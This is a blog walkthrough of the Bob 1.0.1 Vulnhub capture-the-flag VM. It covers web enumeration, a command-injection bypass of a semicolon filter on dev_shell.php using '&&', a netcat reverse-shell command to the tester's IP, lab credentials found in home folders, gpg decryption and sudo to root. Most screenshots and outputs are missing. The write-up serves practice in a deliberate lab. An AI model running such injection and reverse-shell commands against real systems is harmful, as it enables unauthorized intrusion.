Bob 1.0.1 Vulnhub Walkthrough

The Bob 1.0.1 VM download from Vulnhub can be found here: https://www.vulnhub.com/entry/bob-101,226/

The creator of this VM is c0rruptedb1t

Here’s the basic description:

Difficulty: Beginner/Intermediate

Bob is my first CTF VM that I have ever made so be easy on me if it’s not perfect.

The Milburg Highschool Server has just been attacked, the IT staff have taken down their windows server and are now setting up a linux server running Debian. Could there a few weak points in the new unfinished server?

Your Goal is to get the flag in /

Hints: Remember to look for hidden info/files

1. Service Enumeration

I started this off with the following nmap command:

The interesting results of the scan are as follows in a text format:

This system is running 2 services. An Apache web service and an OpenSSH service.

2. Web Enumeration

I ran both nikto and dirbuster to see if the tools might find anything the other missed. They both had basically the same results, so it that being said here was the results of the nitko scan:

You can click the spoiler button below if you are interested in the dirbuster settings / screenshots. This is if you would prefer to use dirbuster over nikto or run it in conjunction for future VMs:

Show spoiler

Reviewing the robots.txt file:

Screenshot of the dev_shell.php page (which is out attack vector):

Text output of lat_memo.html:

Text output of the passwords.html file:

The passwords file is going to be useful down the road for our privilege escalation.

3. Establish a foothold

So our attack vector is the dev_shell.php. That being said the developer / owner of the site added a security check to the PHP code that looks to see if someone injects a semi-colon (;) into the command field. If the semi-colon is found, we get a fun response that basically says “Nice try skid, but you will never get through this bulletproof php code.”

There are a number of different ways to try and execute other commands that does not use the semi-colon. I ended up using the double ampersand (&&) but one can use a pipe ( | ) or double pipe ( || ) to execute their commands as well:

Using echo && id I was able to get a response about what account the web server is running as:

On my Kali box, I launched the metasploit framework / console and set up my exploit / payloads:

After setting everything up, I simply typed run which essentially creates a netcat listener on our machine to put it simply.

On the victim’s PHP shell, we used echo && nc 192.168.1.29 4444 -e /bin/bash and hit the submit button:

We have a basic reverse shell now:

In order to get an interactive shell, we use the following command:

4. Privilege Escalation

Based on our web enumeration, it looks like Bob is our system administrator. So I browsed to /home to see Bob’s directory and if there were any other users:

Bob’s Home Directory

Taking a look at Bob’s directory we see a “hidden” html file called old_passwordfile.html

Performing a head command on the file:

So now we have a pair of credentials for 2 of the 4 users on this system:

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Further searching into Bob’s home folder, we find something in his Documents:

The login.txt.gpg is an encrypted file which has Bob’s password. We will come back to this later.

The staff.txt file contains some information about how our system user’s interact with one another:

Further exploration into the Secrets folder under Bob, we come across a shell script file that was nested in a bunch of folders:

This shell script might not look like muchm, but it will come in handy later and will be discussed in the walkthrough.

Elliot’s Home Directory

The only thing of interest is the file seen above called theadminisdumb.txt — there wasn’t anything else of value in his home directory. That being said, here is the contents of the file:

So now we have verification that james (jc)’s password is indeed Qwerty and that Elliot’s password is theadminisdumb.

So to reiterate we have the following sets of credentials:

  • elliot:theadminisdumb
  • jc:Qwerty
  • seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Seb’s Home Directory

There wasn’t anything in here of significance.

At this point we need Bob’s credentials which is the admin of the box. Earlier in this walkthrough we found the login.txt.gpg file and a notes.sh shell script file containing some strings.

Here’s the notes.sh file again

The first letter of each line actually spells out the word HARPOCRATES. Harpocrates was the Greek god of silence, secrets, and confidentiality.

Using the following command on the system itself:

We are using the built in gpg encrypting / decrypting tool. We provide it the passphrase we found, and specify we want to decrypt the file.

The result shows us Bob’s password of b0bcat_

Signing in as bob:

So just to make sure, we perform a sudo -l to see if bob has root access or commands he can use:

Using sudo bash we obtain a root shell and then navigate to the / directory where the flag.txt file is per the VM description above.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store